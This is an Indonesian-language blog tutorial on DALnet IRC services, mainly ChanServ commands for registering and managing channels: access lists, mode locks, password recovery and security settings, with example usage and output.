Keterangan : Perintah ini gunanya untuk meminta NickServ mengirimkan password nickname kamu ke email.
Catatan : Alamat email yang kamu masukkan harus sama dengan alamat email nickname kamu yang terdaftar di database DALnet. Perintah SENDPASS tidak akan berfungsi apabila kamu men-set MAILBLOCK on.

Contoh : /nickserv SENDPASS d0ntcry d0ntcry@hackermail.com
Meminta NickServ untuk mengirimkan password nick d0ntcry ke email d0ntcry@hackermail.com.

============================================

Format penulisan perintah :
/msg chanserv@services.dal.net [command] [option] [sub-command]
atau dapat disingkat menjadi :
/cs [command] [option] [sub-command]

.:: REGISTER ::.
Penggunaan : /chanserv REGISTER #channel password description
Keterangan : Memerintahkan ChanServ untuk me-register suatu channel.
Catatan : Untuk meregister sebuah channel yang belum diregister kamu harus punya status @ (operator) di channel tersebut. Jangan memberitahukan password kepada orang lain, gunakan kombinasi abjad dan angka yang mudah kamu ingat tapi susah ditebak oleh orang lain.

Contoh : /chanserv REGISTER #kompeni menermenur dont flood my channel with your ego
Memerintahkan ChanServ untuk me-register channel #kompeni dengan password menermenur dan deskripsi dont flood my channel with your ego.

.:: DROP ::.
Penggunaan : /chanserv DROP #channel [dropcode]
Keterangan : Perintah ini untuk men-drop (un-register) sebuah channel. Gunakan /chanserv DROP #channel tanpa dropcode, tunggu konfirmasi dropcode dari chanserv dan masukkan perintah /chanserv DROP #channel [dropcode].
Catatan : Untuk menggunakan perintah ini kamu harus punya akses founder dan identify ke ChanServ.

Contoh : /chanserv DROP #kompeni
Perintah untuk men-drop channel #kompeni, setelah memasukkan perintah di atas tunggu di status kamu muncul konfirmasi dropcode dari ChanServ yang bentuknya seperti ini :
-ChanServ- Dropping a channel is permanent and cannot be undone!
-ChanServ- To confirm, type: /chanserv DROP #kompeni 13151683216
Selanjutnya silahkan ketik /chanserv DROP #kompeni 13151683216 dan selamat, kamu telah kehilangan sebuah channel kwekwekwek;p.

.:: IDENTIFY ::.
Penggunaan : /chanserv IDENTIFY #channel password atau /IDENTIFY #channel password
Keterangan : Perintah ini untuk meng-identify diri kamu sebagai founder channel dan perintah ini memberikan kamu hak akses penuh untuk menggunakan perintah yang hanya dapat digunakan oleh founder.
Contoh : /chanserv IDENTIFY #kompeni menermenur
Identify sebagai founder channel #kompeni dengan password channel menermenur.

.:: SENDPASS ::.
Penggunaan : /chanserv SENDPASS #channel email
Keterangan : Perintah ini digunakan founder untuk mengirimkan password channel ke email. Perintah ini berguna apabila founder lupa/kehilangan password channel.
Catatan : Password hanya akan dikirimkan oleh service DALnet apabila email yang diberikan pada perintah SENDPASS sama dengan email pada database DALnet. Email channel sama dengan email nick founder. Perintah SENDPASS dapat di-disable dengan perintah MAILBLOCK.

Contoh : /chanserv SENDPASS #kompeni d0ntcry@admin.kompeni-dal.net
Meminta ChanServ untuk mengirimkan password channel #kompeni ke email d0ntcry@admin.kompeni-dal.net.

.:: SOP - ADD | DEL | LIST | WIPE ::.
Penggunaan : /chanserv SOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder untuk menambah SOP (SuperOperator) baru (ADD), menghapus SOP (DEL), menampilkan datfar SOP channel (LIST) dan menghapus seluruh SOP dari daftar (WIPE).
Catatan : Perintah ADD, DEL, WIPE hanya dapat digunakan oleh founder, perintah LIST dapat digunakan oleh level AOP ke atas. Daftar SOP dibatasi maksimum 100 entri.

Contoh : /chanserv SOP #kompeni ADD ketua_pengemis
Menambahkan nick ketua_pengemis ke dalam daftar SOP channel #kompeni.

.:: AOP - ADD | DEL | LIST | WIPE ::.
Penggunaan : /chanserv AOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AOP (AutoOperator) baru (ADD), menghapus AOP (DEL), menampilkan datfar AOP channel (LIST) dan menghapus seluruh AOP dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AOP dibatasi maksimum 300 entri.

Contoh : /chanserv AOP #kompeni ADD ketua_pengemis
Menambahkan nick ketua_pengemis ke dalam daftar AOP channel #kompeni.

.:: AKICK - ADD | DEL | LIST | WIPE ::.
Penggunaan : |DEL|LIST|WIPE [nick|mask|host]
Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AKICK (AutoKick) baru (ADD), menghapus AKICK (DEL), menampilkan datfar AKICK channel (LIST) dan menghapus seluruh AKICK dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AKICK dibatasi maksimum 200 entri.

Contoh : /chanserv AKICK #kompeni DEL *!*@*.net.id
Menghapus host *!*@*.net.id dari daftar AKICK channel #kompeni.

.:: OP | DEOP ::.
Penggunaan : /chanserv OP|DEOP #channel nickname
Keterangan : Perintah ini digunakan untuk meminta ChanServ memberikan atau mengambil status Operator @ nickname seseorang di channel.
Catatan : Perintah ini hanya dapat digunakan apabila kamu mempunyai akses minimal AOP di channel yang bersangkutan. Kamu tidak dapat men-DEOP seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang AOP tidak dapat men-DEOP SOP.

Contoh : /chanserv OP #kompeni bos_preman
Meminta ChanServ memberikan status Operator kepada nick bos_preman di channel #kompeni.

.:: MKICK ::.
Penggunaan : /chanserv MKICK #channel
Keterangan : Perintah MKICK (MassKick) ini hanya digunakan pada keadaan tertentu, misalnya pada keadaan disinkronisasi di channel (saat terjadi netsplit) atau keadaan lainnya. Untuk keterangan lebih lanjut tentang netsplit silahkan kunjungi DALnet Documentation Project Site http://docs.dal.net/docs/netsplits.html.
Catatan : Perintah ini tidak dapat kamu gunakan apabila di dalam channel terdapat seseorang yang mempunyai akses level lebih tinggi dari kamu, seorang SOP tidak dapat menggunakan perintah MKICK apabila founder berada di dalam channel. Perintah ini menurut pandangan pribadi saya mempunyai akibat yang fatal, jadi tolong jangan sembarangan digunakan.

Contoh : /chanserv MKICK #kompeni
Memerintahkan ChanServ MassKick di channel #kompeni.

.:: MDEOP ::.
Penggunaan : /chanserv MDEOP #channel
Keterangan : Perintah MDEOP (MassDe-OP) ini akan men-DEOP semua orang di dalam channel yang mempunyai akses level sama dengan dan lebih rendah dari kamu, seorang AOP hanya dapat men-DEOP semua AOP dan operator non-permanen.

Contoh : /chanserv MDEOP #kompeni
Memerintahkan ChanServ MassDe-OP di channel #kompeni.

.:: SET - FOUNDER ::.
Penggunaan : /chanserv SET #channel FOUNDER
Keterangan : Perintah ini digunakan untuk meminta ChanServ mengganti nickname founder menjadi nickname yang sedang kamu gunakan sekarang.
Catatan : Nickname yang ingin kamu set menjadi founder harus sudah teregistrasi penuh dan kamu sebelumnya sudah identify ke ChanServ menggunakan password channel.

.:: SET - PASSWD ::.
Penggunaan : /chanserv SET #channel PASSWD oldpassword newpassword
Keterangan : Perintah ini untuk mengganti password channel.
Catatan : Untuk alasan keamanan, sangat disarankan untuk mengganti password channel kamu secara periodik.

Contoh : /chanserv SET #kompeni PASSWD menermenur menormenir
Mengganti password channel #kompeni dari menermenur menjadi menormenir.

.:: SET - DESC ::.
Penggunaan : /chanserv SET #channel DESC newdescription
Keterangan : Perintah ini untuk mengganti deskripsi channel.

Contoh : /chanserv SET #kompeni DESC fuck arrogant person!!!
Mengganti deskripsi channel #kompeni menjadi fuck arrogant person!!!.

.:: SET - MLOCK ::.

Penggunaan : /chanserv SET #channel MLOCK mode_lock_option
Keterangan : Perintah ini digunakan untuk men-set MLOCK (Mode Lock) channel. Perintah ini merupakan salah satu perintah penting dalam mengelola keamanan channel. Berikut di bawah ini adalah mode_lock_option yang bisa kamu gunakan beserta keterangannya :
R - Only Registered nicks allowed (hanya nick yang sudah teregistrasi yang diizinkan masuk ke dalam channel). Sangat berguna apabila kamu ingin menghentikan serangan clone, karena sebagian besar serangan clone menggunakan nick yang tidak teregistrasi. Disarankan untuk membiarkan opsi R dalam keadaan un-set dan hanya diaktifkan pada saat channel menghadapi serangan clone, dapat diaktifkan melalui perintah /mode #channel +R
+n - No external messages (tidak menerima message/pesan dari luar channel). Untuk mencegah orang yang tidak berada di dalam channel mengirimkan pesan ke channel. Disarankan men-set MLOCK +N.
+t - Only ops set topic (hanya yang mempunyai status operator (@) di channel yang dapat merubah topic channel). Untuk mencepat user biasa merubah topic channel.
+p - Channel is private (pribadi). Untuk membuat channel tidak terlihat di daftar channel pada saat user IRC menggunakan perintah /list untuk keterangan lebih lengkap silahkan ketik /help /list� di jendela status Mirc.
+s - Channel is secret (rahasia). Mempunyai fungsi yang sama dengan +p plus dengan tambahan channel tidak terlihat di whois. Kedua opsi MLOCK ini berguna untuk mencegah user yang tidak diinginkan masuk ke dalam channel.
+i - Channel is invite-only. Opsi ini membuat channel tertutup bagi semua orang sampai ada operator channel yang mengundang (invite) mereka atau mereka yang mempunyai akses ke channel menggunakan perintah /chanserv INVITE #channel.
+k - Required secret key (membutuhkan kunci rahasia/password). Setiap user harus memasukkan password yang benar baru bisa masuk ke dalam channel. Disarankan untuk men-set MLOCK -k bagi channel yang terbuka untuk umum.
+l - Channel is limited to person. Untuk membatasi jumlah user yang dapat masuk ke channel pada angka tertentu. Biasanya hanya digunakan apabila channel memiliki bot/shell untuk mengantisipasi serangan clone.
+m - Channel is moderated. Untuk mencegah user channel yang tidak memiliki status voice dan operator (tanda + dan @ di depan nickname) berbicara/chat di dalam channel. Disarankan untuk membiarkan opsi m dalam keadaan un-set dan hanya diaktifkan pada saat channel diserang flooder (flooding-attack), dapat diaktifkan melalui perintah /mode #channel +m
+c - Disable control codes (color, bold, underline, reverse). Untuk mencegah user chat di dalam channel menggunakan control codes (warna, cetak tebal, garis bawah, text ber latar-belakang). Opsi ini juga berguna dalam menghadapi serangan clone. Untuk keterangan lebih lanjut silahkan ketik /help control codes� di jendela status Mirc atau kunjungi DALnet Documentation Project Site http:/docs.dal.net/docs/modes.html.

Contoh : /chanserv SET #kompeni MLOCK +snt-kl
Men-set Mode Lock channel #kompeni ke mode +snt-kl (mengaktifkan opsi secret, no external message, only ops set topic dan menon-aktifkan opsi secret key, channel is limited).

.:: SET - OPGUARD ::.
Penggunaan : /chanserv SET #channel OPGUARD on|off
Keterangan : Apabila OPGUARD di-set ke posisi ON maka hanya AOP, SOP dan founder yang diizinkan ChanServ untuk memiliki status Operator (@) di dalam channel, operator lain tanpa akses minimal AOP akan diturunkan oleh ChanServ.
Catatan : Disarankan untuk men-set OPGUARD ke posisi ON untuk alasan keamanan channel dan mencegah user yang tidak diinginkan memiliki status operator di channel.

.:: SET - KEEPTOPIC ::.
Penggunaan : /chanserv SET #channel KEEPTOPIC on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan menyimpan topic channel pada saat channel tidak ada user dan mengembalikan topic channel apabila ada user yang masuk.

SET - URL
Penggunaan : /chanserv SET #channel URL [www.domainname.com]
Keterangan : Perintah ini untuk men-set alamat URL (Uniform Resource Locator) channel kamu, dimana URL channel dapat dilihat dengan perintah /chanserv INFO #channel.
Catatan : Untuk menghapus URL channel kamu cukup ketikkan /chanserv SET #channel URL� tanpa diikuti nama domain (URL).

Contoh : /chanserv SET #kompeni URL www.d0ntcry-kompeni.dal.net
Men-set URL channel #kompeni ke www.d0ntcry-kompeni.dal.net.

.:: SET - IDENT ::.
Penggunaan : /chanserv SET #channel IDENT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka para operator harus terlebih dahulu identify sebelum mereka di-Op oleh ChanServ.

.: SET - RESTRICT ::.
Penggunaan : /chanserv SET #channel RESTRICT on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ tidak akan mengizinkan user yang tidak terdaftar di access list channel untuk masuk ke dalam channel. ChanServ akan segera meng-Kick & Ban mereka. Hanya user dengan akses minimal AOP channel yang diizinkan masuk.

.:: SET - VERBOSE ::.
Penggunaan : /chanserv SET #channel VERBOSE on|off
Keterangan : Perintah ini apabila di-set ke posisi ON maka ChanServ akan me-Notify (mengirimkan pesan) setiap operator di dalam channel apabila terjadi perubahan pada access list channel seperti penambahan/penghapusan AOP, SOP, AKICK.
Notify dari chanserv akan berbentuk seperti ini :
-ChanServ:@#kompeni- [VERBOSE] zuguz!Lonely@202.155.32.53 => sop #kompeni add zuguz

.:: SET - TOPICLOCK ::.
Penggunaan : /chanserv SET #channel TOPICLOCK founder|sop|off
Keterangan : Perintah ini untuk menentukan siapa saja yang berhak merubah topic channel, Founder, SOP atau user biasa (off).
Catatan : Perintah ini berkaitan dengan perintah /chanserv SET #channel MLOCK +t silahkan lihat kembali bagian SET-MLOCK.

Contoh : /chanserv SET #kompeni TOPICLOCK sop
Perintah ini menentukan hanya operator channel #kompeni dengan akses minimal SOP yang dapat merubah topic channel.

.:: SET - LEAVEOPS ::.
Penggunaan : /chanserv SET #channel LEAVEOPS on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka ChanServ akan membiarkan user pertama yang masuk ke dalam channel memiliki status operator @ (channel dalam keadaan kosong). Pada keadaan default, LEAVEOPS di-set pada posisi OFF, ini artinya ChanServ akan men-DEOP siapapun yang tidak memiliki akses minimal AOP. Sangat direkomendasikan kepada kamu untuk membiarkan setting LEAVEOPS pada keadaan OFF dengan alasan keamanan.

.:: SET - UNSECURE ::.
Penggunaan : /chanserv SET #channel UNSECURE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka siapapun yang berada dalam access list nickname Founder tidak perlu identify terlebih dahulu untuk melakukan perubahan pada setting channel. Disarankan untuk membiarkan setting UNSECURE pada keadaan keadaan default (OFF).

.:: SET - PRIVATE ::.
Penggunaan : /chanserv SET #channel PRIVATE on|off
Keterangan : Perintah ini apabila di-set pada posisi ON maka akan membuat perintah /chanserv INVITE tidak dapat digunakan. Dan hanya user yang mengetahui nama channel saja yang bisa masuk, nama channel juga tidak muncul di daftar channel (mirip dengan MLOCK +p).

.:: SET - MEMO ::.
Penggunaan : /chanserv SET #channel MEMO none|aop|sop|founder
Keterangan : Melalui perintah ini seorang Founder dapat menentukan siapa saja yang berhak mengirimkan memo channel.
none - tidak seorangpun dapat mengirimkan memo
aop - semua operator (AOP, SOP, Founder) berhak mengirimkan memo
sop - hanya operator dengan akses SOP dan Founder yang berhak mengirimkan memo
founder - hanya founder yang berhak mengirimkan memo

.:: SET - SUCCESSOR ::.
Penggunaan : /chanserv SET #channel SUCCESSOR nickname|-
Keterangan : Dengan perintah ini seorang Founder dapat menentukan nickname pengganti/cadangan apabila nickname founder expired. Pada saat nickname founder expired maka hak akses founder akan dialihkan kepada nickname cadangan tersebut. Apabila kamu ingin menghapus setting nickname Successor gunakan perintah /chanserv SET #channel SUCCESSOR -

Contoh : /chanserv SET #kompeni SUCCESSOR ketua_pengemis
Men-set SUCCESSOR channel #kompeni pada nickname ketua_pengemis

.:: SET - WEBPASSWD ::.
Penggunaan : /chanserv SET #channel WEBPASSWD password
Keterangan : Perintah ini gunanya untuk menentukan password bagi web site channel. DALnet memberikan fasilitas Webhosting bagi channel yang teregistrasi di databasenya. Keterangan lebih lanjut silahkan kunjungi DALnet Documentation Project Site bagian Webhosting Service.
Catatan : Password website harus berbeda dengan password channel supaya dapat dengan aman diserahkan kepada orang lain untuk dikelola.

Contoh : /chanserv SET #kompeni WEBPASSWD passwordweb
Men-set password website channel #kompeni dengan passwordweb.

.:: SET - MAILBLOCK ::.
Penggunaan : /chanserv SET #channel MAILBLOCK on|off
Keterangan : Perintah ini mengizinkan seorang Founder untuk menghidupkan/mematikan fasilitas MAILBLOCK. Apabila di-set pada posisi ON maka perintah /chanserv SENDPASS� tidak dapat lagi digunakan.
Catatan : Fasilitas MAILBLOCK ini tidak boleh dihidupkan (ON) sampai seorang Founder yakin sekali dirinya tidak menderita penyakit lupa ingatan.

.:: INVITE ::.
Penggunaan : /chanserv INVITE #channel
Keterangan : Perintah ini akan meng-Invite diri kamu sendiri ke dalam channel yang di-set mode +R/+O/+i/+l/+k/+b.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.

.:: ACC / ACCESS ::.
Penggunaan : /chanserv ACC|ACCESS #channel nickname
Keterangan : Perintah ini digunakan oleh seseorang yang memiliki akses AOP atau lebih tinggi untuk melihat hak akses dirinya sendiri atau orang lain di channel. Berikut di bawah ini adalah definisi dari level hak akses (dalam angka) :
-2 = Channel is frozen or closed (channel dibekukan atau ditutup)
-1 = AutoKICKed from the channel (nickname bersangkutan masuk dalam daftar AKICK channel)
0 = basic (nickname bersangkutan tidak punya akses di channel atau sedang tidak On-Line)
1 = AutoOp (akses AOP - Auto Operator)
2 = SuperOp (akses SOP - Super Operator)
3 = Has founder access via a NickServ access list mask (akses Founder via daftar akses pada database NickServ)
4 = Has founder access via identification to NickServ (akses Founder via Identify password nick pada NickServ)
5 = Has founder access via identification to ChanServ (akses Founder via Identify password channel pada ChanServ)
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.

Contoh : /chanserv ACC #kompeni d0ntcry
Melihat level hak akses nick d0ntcry di channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- d0ntcry ACC #kompeni 2 (SOP)

.:: WHY ::.
Penggunaan : /chanserv WHY #channel nickname
Keterangan : Perintah ini mirip dengan perintah ACC/Access, hasilnya berupa status user di channel (AOP/SOP/Founder). Gunanya untuk melihat hak akses yang digunakan user untuk naik menjadi operator channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.

Contoh : /chanserv WHY #kompeni d0ntcry
Melihat status/hak akses nick d0ntcry di channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- d0ntcry has FOUNDER access to #kompeni. Reason: Identification to services with the channel password.

.:: UNBAN ::.

Penggunaan : /chanserv UNBAN #channel nickname|*|nick!user@host.domain
Keterangan : Perintah ini gunanya untuk meminta ChanServ meng-Unbanned diri kamu, nickname lain, host/domain tertentu, dan seluruh daftar banned. Untuk meng-Unbanned diri kamu cukup ketik /chanserv UNBAN #channel.
Catatan : AOP hanya dapat meng-Unbanned diri sendiri, nickname lain dan host/domain tertentu, SOP dan Founder dapat meng-Unbanned seluruh daftar banned dengan menggunakan tanda *.

.:: COUNT ::.
Penggunaan : /chanserv COUNT #channel
Keterangan : Perintah ini untuk meminta ChanServ menghitung jumlah AOP, SOP dan AKICK suatu channel.
Catatan : Untuk menggunakan perintah ini minimal kamu harus memiliki akses AOP di channel tersebut.

Contoh : /chanserv COUNT #kompeni
Menghitung jumlah AOP, SOP dan AKICK channel #kompeni dan notify dari ChanServ lebih kurang seperti di bawah ini :
-ChanServ- Channel: #kompeni - AOP: 20 SOP: 11 AKICK: 5

.:: INFO ::.
Penggunaan : /chanserv INFO #channel
Keterangan : Untuk menampilkan informasi tentang channel (setting, topik, tanggal register, tanggal terakhir penambahan AOP/SOP, dll).

Contoh : /chanserv INFO #kompeni
Menampilkan informasi tentang channel #kompeni, hasilnya lebih kurang seperti di bawah ini :
-ChanServ- Info for #kompeni:
-
-ChanServ- Founder : d0ntcry (~n0b0dy@ngebet.pengen.ml.ma.pacar.la)
-
-ChanServ- Mode Lock : -s
-
-ChanServ- Last Topic : Apa asikx cinta tanpa "CIPOX" bagai sawah tanpa "KODOK" bagai "REMAJA" tanpa "ROKOK" bagai "BH" tanpa "KATOX" tpi klu cuman berani "CIPOX" gak berani "NGOBOK²" tuh namax "KATROX"|by:Zuguz (zuguz)
-
-ChanServ- Description: If you arrogant person..please go out in channel kompeni!!ok..
-
-ChanServ- Options : SecuredOps, Ident, "Sticky" Topics
-
-ChanServ- Memo Level : AOP
-
-ChanServ- Registered : Wed 24-Sep-2008 04:23:41 UTC
-
-ChanServ- Last opping: Sat 07-Mar-2009 12:13:56 UTC
-
-ChanServ- *** End of Info ***

Referensi perintah ChanServ :
The DALnet IRC Network : /chanserv help [command] [sub-command]
The DALnet Documentation Project : http://docs.dal.net/chanserv.htm
DALnet™s Homepage : http://www.dal.net/services/

sumber : http://ircmataram.wordpress.com
http://www.virtual-dalnet.com/nickserv.html

Kalo kesulitan join aja di #kompeni@irc.dal.net
1 komentar more...

Looking for something beib?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!